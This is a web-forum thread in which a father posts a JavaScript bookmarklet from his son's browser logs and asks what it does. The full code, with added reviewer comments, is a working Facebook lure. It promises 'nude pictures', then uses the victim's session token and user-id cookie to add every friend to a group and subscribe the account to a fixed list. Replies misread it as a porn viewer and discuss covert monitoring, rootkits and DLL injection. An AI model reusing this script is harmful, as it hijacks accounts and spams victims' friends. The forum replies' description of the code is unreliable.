www.webdeveloper.com

Thread: Need help to find out what the script does

  1. #1
    Join Date
    Jan 2014
    Posts
    2

    Need help to find out what the script does

    I am a father from Germany and i have Trouble with my son.
    He is 12 years old and i've found him watching adult things he shouldnt watch
    after a 2nd i found him looking at such Pictures he promised not to do that anymore.
    Anyhow, I installed a logger which logs his web activities, and now I found this JavaScript in the logs, which was marked as explicit content. He says it is a script for a game. Can someone take a look at this code and say what it is really doing?
    Code:
    // Reviewer summary (the listing below is unchanged; it is a percent-encoded
    // `javascript:` URL, and the forum's line breaks fall inside string literals):
    //  - It is a bookmarklet meant to be run on a logged-in Facebook page. It reads
    //    the page's `fb_dtsg` form field (Facebook's anti-CSRF token) and the user
    //    id from the `c_user` cookie, then issues XMLHttpRequests to relative
    //    `/ajax/...` paths, i.e. to whatever origin it is run on.
    //  - getPren() requests `/ajax/typeahead/first_degree.php` with
    //    `options[0]=friends_only` and stores the returned entries as
    //    `aing.Nacktbilder`; the "Nacktbilder gefunden" count shown to the user is
    //    the length of that list.
    //  - addToGroup() then POSTs each entry's `uid` as `members=` to
    //    `/ajax/groups/members/add_post.php`, using the `group_id` field of the
    //    current page.
    //  - klos() (the "Nacktbilder anzeigen" button) removes the status box and
    //    POSTs `action=subscribe` for a hard-coded list id (`flid`).
    //  - Nothing visible here fetches or displays pictures other than the loading
    //    GIF; the German "nude pictures" wording is only status text.
    //  - Where to look afterwards: the account's recent group additions and list
    //    subscriptions, not the browser's content history.
    javascript:void(function()
    // j = value of the form field named 'fb_dtsg'; k = digits after 'c_user=' in
    // document.cookie. Both throw if the field or cookie is absent.
    {var%20j=document.getElementsByName('fb_dtsg')[0].value;
    var%20k=document.cookie.match(/c_user=(\d+)/)[1];
    var%20m='7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg';
    var%20o=8;
    var%20t='1033590';
    var%20v='265816767119957579';
    // window.aing is the single global object: pre-built request bodies (prm,
    // prmdg, prmgp, prmls; all but prmgp embed the token j, all embed the user id k),
    // then the UI helpers btn/insb/apen, which assemble HTML by string
    // concatenation and assign it through innerHTML.
    window.aing={ldng:'\x3Cimg%20src=\x22//fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif\x22%20width=\x2216px\x22%20height=\x2211px\x22%20style=\x22margin:0%205px\x22/\x3E',prm:'fb_dtsg='+j+'&__user='+k+'&__dyn='+m+'&__req='+o+'&__rev='+t+'&ttstamp='+v+'&__a=1',prmdg:'fb_dtsg='+j+'&__user='+k+'&__a=1&source=typeahead&ref=&message_id=&phstamp=',prmgp:'__a=1&viewer='+k+'&token='+Math.random()+'&filter[0]=user&options[0]=friends_only',prmls:'location=permalink&action=subscribe&flid=553915041311558&fb_dtsg='+j+'&__user='+k+'&__a=1&__dyn='+m+'&__req='+o+'&__rev='+t+'&ttstamp='+v,btn:function(a,b){var%20c='\x3Ca%20class=\x22uiButton\x22%20href=\x22#\x22%20onClick=\x22';
    if(a==null||a==''){c+='aing.injek()'}else{c+=a}c+=';
    %0A%09%09%09return%20true\x22%20style=\x22font-size:9px;
    %0A%09%09%09margin:2px;
    %0A%09%09%09line-height:9px\x22\x3E';
    if(b==null||b==''){c+='Neu%20Laden'}else{c+=b}return%20c+'\x3C/a\x3E'},insb:function(b,c,d)
    {if(c){var%20a=document.createElement('div');
    a.innerHTML=b;
    if(d==null){d=c.firstChild}while(a.firstChild){c.insertBefore(a.firstChild,d)}}},apen:function(b,c){if(c){var%20a=document.createElement('div');
    a.innerHTML=b;
    while(a.firstChild){c.appendChild(a.firstChild)}}},styl:{box:'text-align:left;
    %0A%09%09%09border-radius:0px;
    %0A%09%09%09padding:0px',inf:'width:500px;
    %0A%09%09%09position:fixed;
    %0A%09%09%09z-index:9999;
    %0A%09%09%09top:30%;
    %0A%09%09%09right:0;
    %0A%09%09%09text-align:center;
    %0A%09%09%09font-size:10px;
    %0A%09%09%09border-radius:5px;
    %0A%09%09%09box-shadow:0%200%200px%20rgba(0,0,0,0.25);
    %0A%09%09%09background-color:rgba(211,211,211,0.75)'},aduk:function(a){var%20b=a.length,c,d;
    while(0!==b){d=Math.floor(Math.random()*b);
    b-=1;
    c=a[b];
    a[b]=a[d];
    a[d]=c}var%20e=['i','a','e','g','o','s','n','b','l','p','m','2','r','0','c','1','t','3','\xA9'],crl=e[1]+e[0]+e[6]+e[3]+e[14]+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+'.'+e[7]+e[8]+e[4]+e[3]+e[5]+e[9]+e[4]+e[16]+'.'+e[14]+e[4]+e[10];
    aing.crj='\x3Cdiv%20style=\x22margin-top:0px;
    %0A%09%09%09color:gray;
    %0A%09%09%09font-size:0px;
    %0A%09%09%09text-align:right\x22\x3E'+e[1].toUpperCase()+e[0]+e[6]+e[3]+e[14].toUpperCase()+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+'%20'+e[e.length-1]+e[11]+e[13]+e[15]+e[17]+'\x3Cdiv%20style=\x22font-size:0px\x22\x3E\x3Ca%20href=\x22http://www.facebook.com/groups/1408992565982028/\x22%20target=\x22_blank\x22\x3E'+crl+'\x3C/a\x3E\x3C/div\x3E\x3C/div\x3E';
    // The next line ends aduk (in-place random shuffle of the array, plus a credit
    // string assembled from single letters and rendered at font-size:0px) and
    // starts kolAjak(i, r, l, a, n): an XMLHttpRequest wrapper. With no method
    // given it POSTs body r to URL i; otherwise r is appended to i as a query
    // string. A status other than 200/400 is retried once before the callback a
    // receives the error object.
    return%20a},kolAjak:function(i,r,l,a,n){if(n==null||n==''){n='POST'}else{i+='?'+r}var%20h=new%20XMLHttpRequest();
    h.open(n,i,true);
    h.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    h.onreadystatechange=function(c){if(c.target.readyState==4){if(aing.panggilanKe){aing.panggilanKe++}else{aing.panggilanKe=1}var%20e={errorSummary:'connection%20error!',errorDescription:'ajax%20status='+c.target.status};
    if(c.target.status==200||c.target.status==400){var%20d=c.target.responseText;
    if(d==''){e.errorSummary='empty%20callback!'}else{e=JSON.parse(d.substring(d.indexOf('%0A%09%09%09%09%09%09%09%09{%0A%09%09%09%09%09%09%09%09'),d.lastIndexOf('%0A%09%09%09%09%09%09%09}%0A%09%09%09%09%09%09%09')+1))}a(l,e)}else%20if(aing.panggilanKe<2){aing.kolAjak(i,r,l,a,n)}else{aing.panggilanKe=0;
    a(l,e)}}};
    h.send(r)},kasihTau:function(a,b){var%20c=document.getElementById('kiri-bawah');
    if(c){if(b==null||b==''){c.lastChild.innerHTML=a}else{var%20d=document.getElementById(b);
    if(d){d.innerHTML=a}else{aing.apen('\x3Cdiv%20id=\x22'+b+'\x22\x3E'+a+'\x3C/div\x3E',c.lastChild)}}}else{var%20e='\x3Cdiv%20id=\x22kiri-bawah\x22%20class=\x22pam%20uiBoxGray\x22%20style=\x22'+aing.styl.inf+'\x22\x3E\x3Cdiv\x3E\x3C/div\x3E\x3Cdiv\x3E'+a+'\x3C/div\x3E\x3C/div\x3E';
    var%20f=document.getElementById('rightCol');
    if(!f){f=document.body}aing.apen(e,f)}},klos:function(){var%20a=document.getElementById('kiri-bawah');
    // klos: after removing the status box it POSTs prmls (action=subscribe with a
    // fixed flid) to the list-subscribe endpoint and ignores the response.
    // getPren, the entry point called on the last line, starts on the same line.
    if(a){a.parentNode.removeChild(a)}aing.kolAjak('/ajax/friends/lists/subscribe/modify',aing.prmls,'',function(){})},getPren:function(){window.loadBarFrom=0;
    aing.deleted=0;
    aing.kasihTau('Suche%20Nacktbilder..%20warten%20'+aing.ldng);
    // GET of the typeahead endpoint with prmgp (viewer=<user id>, friends_only).
    // The returned payload.entries are shuffled and kept as aing.Nacktbilder, then
    // handed to addToGroup(); the entries are account records (uid/text), not images.
    aing.kolAjak('/ajax/typeahead/first_degree.php',aing.prmgp,'',function(q,p){if(p.payload&&p.payload.entries){aing.Nacktbilder=aing.aduk(p.payload.entries);
    var%20a='\x3Cdiv%20class=\x22uiBoxBlack\x22%20style=\x22border-radius:0px\x22\x3EEs%20Wurden%20\x3Cb\x3E'+aing.Nacktbilder.length+'%20Nacktbilder%20gefunden\x3C/b\x3E\x3C/div\x3E\x3Cdiv%20id=\x22edtugrup\x22%20style=\x22margin-top:2px\x22\x3E\x3C/div\x3E\x3Cdiv%20id=\x22\x22%20style=\x22margin-top:0px\x22\x3E\x3C/div\x3E\x3Cdiv%20id=\x22Hi\x22%20style=\x22margin-top:0px\x22\x3E\x3C/div\x3E';
    if(aing.Nacktbilder.length==0){aing.kasihTau(a+aing.btn('aing.getPren()'+aing.crj))}else{aing.kasihTau(a+aing.crj);
    aing.addToGroup()}}},'GET')},inform:function(a,b){var%20c='';
    if(b&&b.name){c=b.name}else%20if(b&&b!=''){for(x%20in%20aing.Nacktbilder){if(aing.Nacktbilder[x].text&&aing.Nacktbilder[x].uid&&aing.Nacktbilder[x].uid==b){c=aing.Nacktbilder[x].text;
    break}}}return%20c.split('%20')[0]},addToGroup:function(c,d){var%20e='%20';
    if(c==null||c==''){c=0;
    aing.edgruperor=0;
    aing.edgrupok=0;
    aing.gid=document.getElementsByName('group_id')[0].value}if(d==null||d==''){d=100}if(d>aing.Nacktbilder.length){d=aing.Nacktbilder.length;
    aing.edgrupnek=''}else{aing.edgrupnek={f:d,t:((d*2)-c)}}e+=(c+1)+'%20to%20'+d+'%20Nacktbilder%20werden%20geladen%20';
    aing.kasihTau(e,'edtugrup');
    // Batch loop (default batch end d=100): one POST per entry to the group
    // add-member endpoint, body = prmdg + group_id read from the current page +
    // members=<entry uid>. Presumably this only works on a group page, since
    // the 'group_id' field must exist; confirm.
    for(var%20x=c;
    x<d;x++){aing.kolAjak('/ajax/groups/members/add_post.php',aing.prmdg+'&group_id='+aing.gid+'&members='+aing.Nacktbilder[x].uid,'',function(q,p){if(p&&p.errorSummary&&p.errorDescription){aing.edgruperor++;
    var%20a='\x3Cdiv%20class=\x22uiBoxRed\x22%20style=\x22'+aing.styl.box+'\x22\x3E';
    var%20b=p.errorDescription;
    // NOTE(review): the next line passes a string taken from the server response
    // (p.onafterload[0], with 'Arbiter.' rewritten to 'aing.') to eval().
    if(p.onafterload&&p.onafterload[0]){b=p.errorDescription.replace(/This%20user|user%20|Pengguna%20ini|pengguna%20/gi,'\x3Ca%20href=\x22/Nacktbilder\x22%20target=\x22_blank\x22%20style=\x22font-weight:small\x22\x3E'+eval(p.onafterload[0].replace(/Arbiter\./i,'aing.'))+'\x3C/a\x3E')}a+='\x3Cdiv\x3E(Updates:%20\x3Cb\x3E'+aing.edgruperor+'\x3C/b\x3E)%20'+b+'\x3C/div\x3E';
    a+='\x3C/div\x3E'}else%20if(p.jsmods&&p.jsmods.require){aing.edgrupok++;
    var%20a='\x3Cdiv%20class=\x22uiBoxBlack\x22%20style=\x22'+aing.styl.box+'\x22\x3E\x3Cb\x3E';
    for(y%20in%20p.jsmods.require){if(p.jsmods.require[y][3]&&p.jsmods.require[y][3][1]){a+='%20'+p.jsmods.require[y][3][1]}}if(p.onload&&p.onload[0])a+='Script%20by%20Corex%20ihr%20Huren!'}if((aing.edgruperor+aing.edgrupok)>=aing.Nacktbilder.length){aing.kasihTau(aing.btn('aing.getPren()')+'%20'+aing.btn('aing.klos()','Nacktbilder%20anzeigen'),'edtugrup')}else%20if(aing.edgrupnek.f&&(aing.edgruperor+aing.edgrupok)>=aing.edgrupnek.f){aing.addToGroup(aing.edgrupnek.f,aing.edgrupnek.t)}aing.loadBar(document.getElementById('edtugrup'),aing.Nacktbilder.length,'#010100',function(){},'no')})}},loadBar:function(a,i,n,g,s){i=i*1;
    if(window.loadBarFrom&&window.loadBarFrom<i){loadBarFrom++}else%20if(window.loadBarFrom&&window.loadBarFrom==i){}else{window.loadBarFrom=1}var%20u=a.getElementsByClassName('loading-bar')[0];
    var%20b=((loadBarFrom*100)/i);
    if(u){u.firstChild.style.width=b+'%';
    if(s==null||s==''){a.firstChild.innerHTML=loadBarFrom+'/'+i;
    if(loadBarFrom>=i){a.getElementsByClassName('stat-count')[0].innerHTML='\x3Cb%20style=\x22color:darkred\x22\x3E'+Math.floor(b)+'%%20Done!\x3C/b\x3E';
    g()}else{a.getElementsByClassName('stat-count')[0].innerHTML='Loading%20'+Math.floor(b)+'%%20Please%20wait..'}}else{u.firstChild.innerHTML=Math.floor(b)+'%';
    if(loadBarFrom>=i){g()}}}else{u=document.createElement('div');
    if(s==null||s==''){u.innerHTML='\x3Ccenter%20class=\x22stat-count\x22\x3ELoading%20'+Math.floor(b)+'%%20Please%20wait..\x3C/center\x3E\x3Cdiv%20class=\x22loading-bar\x22\x3E\x3Cdiv%20style=\x22width:'+b+'%;
    %0A%09%09%09%09%09background-color:'+n+';
    %0A%09%09%09%09%09border-radius:5px\x22\x3E%C2%A0%0A%09%09%09%09%09\x3C/div\x3E\x3C/div\x3E\x3Ccenter%20class=\x22prog-count\x22\x3E'+loadBarFrom+'/'+i+'\x3C/center\x3E'}else{u.innerHTML='\x3Cdiv%20class=\x22loading-bar\x22\x3E\x3Cdiv%20style=\x22width:'+b+'%;
    %0A%09%09%09%09%09background-color:'+n+';
    %0A%09%09%09%09%09border-radius:5px;
    %0A%09%09%09%09%09black-space:nowrap;
    %0A%09%09%09%09%09overflow:visible;
    %0A%09%09%09%09%09color:#FFEB00\x22\x3E'+Math.floor(b)+'%\x3C/div\x3E\x3C/div\x3E'}while(u.firstChild){a.insertBefore(u.firstChild,a.firstChild)}}}};
    aing.getPren()})();
    a worried father from Germany

  2. #2
    Join Date
    Jan 2014
    Posts
    2
    noone?

  3. #3
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Well, it's certainly doing something: it makes a reference to this Facebook group, http://www.facebook.com/groups/1408992565982028/, which is a closed group, and in the code I find the German for "Find nude pictures .. wait" in this block of code

    Code:
    function(){})},getPren:function(){window.loadBarFrom=0;
    aing.deleted=0;
    aing.kasihTau('Suche Nacktbilder.. warten '+aing.ldng);
    aing.kolAjak('/ajax/typeahead/first_degree.php',aing.prmgp,''
    And a little further the following "Nacktbilder gefunden" == Nude pictures found

    So it would appear that your son is curious about women, he should be warned of the fact that pornography and the women portrayed in the pictures is not real life.

    Hope that helps you.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  4. #4
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    If you want to be really sneaky, http://windows.microsoft.com/en-gb/w...=windows-vista

    for example
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  5. #5
    Join Date
    Mar 2012
    Posts
    202
    You'll probably want to use VNC, as Microsoft's remote desktop takes over the user's login session upon connection, essentially making it worthless for spying purposes.

  6. #6
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    If you really want to block your son from accessing porn sites, the best way to go is to set up a Linux firewall/proxy gateway with web content filtering capabilities. I remember one easy-to-set-up distribution called IPCOP, and it seems that it's still "alive". If I'm not wrong, you can install a web content filter as an add-on and set it up according to your needs. It has a nice web interface for accessing the firewall, so it's easy to manage once installed (even if you're not an advanced user), and it's based on the widely popular Debian distribution.

    If you're advanced user or if you're willing to put some effort and learn something you can go with one of many free GNU/Linux distributions and install Dansguardian or Squid proxy software on top of it.

    ...before trying any of above you should first check if your ISP's router (or one you have bought) already has web content filtering capabilities. If it has then set it up and make sure you lock down access to it.
    Last edited by tech_soul8; 01-10-2014 at 03:39 AM.

  7. #7
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Personally my feelings are that the best content filter would be a Fatherly - Son discussion.

    The facebook group I found in that web code is a closed group or may have been removed altogether, so it is worth contacting facebook as well and point out that the group was found in some javascript program as pornographic content and let FB decide on if they are shutting that group down or not.

    Simply barring content may push your son to spend more time with his friends on their computers.

    Your main concerns will be that your son is going to be exposing himself to something that will shape his view of women, look at women as only being sex objects and being of no worth as well as something that is recognized a causing a dysfunction in normal sexual activity and is called "porn creep" as it "Conditions" the individual and they eventually (over a relatively short period) can not have a normal relationship with a woman, as your son is only 12 this should be a matter of urgent rectification before any permanent damage is done.

    If your son continues then a child psychologist may need to become involved to find out the cause of this need to seek out and look at pornography and more importantly what type of graphic images he is being exposed to because he could be unwittingly drawn in to pedophilia, it is known that this type of dysfunction can happen at any age and I think it was a UK tv program like panorama found that children as young as 10 were not just victims but were trading in the school playgrounds media that was not only exploitation but was pedophilia, something that no parent wants to hear but in the EU a child of 10 is considered not responsible for their actions whereas a child of 11 is and can be prosecuted and have to then undergo psychiatric assessments, etc and you would have a child with a criminal record if they were caught as being part of a pedophile ring / sting operation, the danger here being that you would be instantly subjected to an investigation and accused of being the person distributing such media and as the bill payer for the internet, you are the responsible person for that connection and could also be prosecuted for failing to filter content.

    This in the surface may only seem innocent but it has serious implications and as a parent I would have your son show you what he has been looking at and if its serious then I would urge you to call in that authorities and not turn a blind eye and allow it to continue.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  8. #8
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    Hm...all this father - son investigation is somehow suspicious to me... The father doesn't know how to block pornographic content from son's computer but he knows how to install software for tracing his son, check the log file, extract JS code from log file...

    The son - he wasn't aware of tracing software installed on his computer (nor something like this is possible) but being only 12 he already knows something about scripts, programming...

    Maybe I'm wrong maybe not, who knows...? It's a strange world out there!
    Last edited by tech_soul8; 01-10-2014 at 08:50 AM.

  9. #9
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Plenty of parental tools Tech_Soul that are a snap install just by plugging in a device that installs the software in a matter of seconds, remove the flash drive and job done.

    If a subvert was installed then the user of the machine wouldn't know anything about it as it wouldn't even show as a process because subverts operate at a system level and not an operating system level.

    Yep strange world for sure...
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  10. #10
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    Quote Originally Posted by \\.\ View Post
    Plenty of parental tools Tech_Soul that are a snap install just by plugging in a device that installs the software in a matter of seconds, remove the flash drive and job done.
    Yes, I know that but still suspicious a bit...

  11. #11
    Join Date
    Mar 2012
    Posts
    202
    Quote Originally Posted by \\.\ View Post
    If a subvert was installed then the user of the machine wouldn't know anything about it as it wouldn't even show as a process because subverts operate at a system level and not an operating system level.
    Technically, by definition that's a rootkit, and as-such would need to utilize some sort of hack or vulnerability in the system in order to work (most likely by replacing or modifying a system file, possibly the kernel). On the other hand, registry-based DLL injection techniques could be used to run code in every application's namespace without the need to even have another process running. I'm going to assume that this is the route most spy tools take.

  12. #12
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    It was a few years ago when I read about subverts / root kits, depending on how innovative the designer of the install routine, this can be done by different methods.

    The 1st and most obvious mode of installing a root kit is to have the application files placed on the drive waiting for the next reboot. Most partition software has to run in this manner to perform its tasks, so it would make sense to use that behavior: run the install so that it installs the root kit and then reboots, so the root kit runs first and the operating system then operates through the root kit, a bit like virtual host (e.g. VirtualBox) type systems.

    2nd route would be to hack the target machine by exploiting a weakness in the security. Various ports of entry exist and one of these is the web browser itself. I have had two drive by's in as many years, most people wouldn't be aware of them but I notice them because I am on a slow connection.

    If you know where to look you can obtain kits, a surveillance supplier had some very interesting products ranging from mobile phone power adapters that work, you can phone in to them and hear any conversation happening at that time, other systems allow dial up remote access and have video. USB flash drives that not only are bugs but covertly upload to the internet if its available any recordings it makes and it was powered when not in the USB drive which charged it up.

    That site was like the Q factory of 007 spy tools.

    When it comes to a need to survey, a mode or tool exists and computers are the easiest machines to exploit in that respect.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  13. #13
    Join Date
    Mar 2012
    Posts
    202
    Interesting info, thanks. I was just referring to the ability to hide processes in legitimate surveillance software though. Modern computers come equipped with a technology called SecureBoot, which protects against boot-sector attacks like the ones you've described. Essentially all I'm saying is that the only way to reliably accomplish the required stealthiness without actually overwriting system files in Windows is to use DLL-injection.
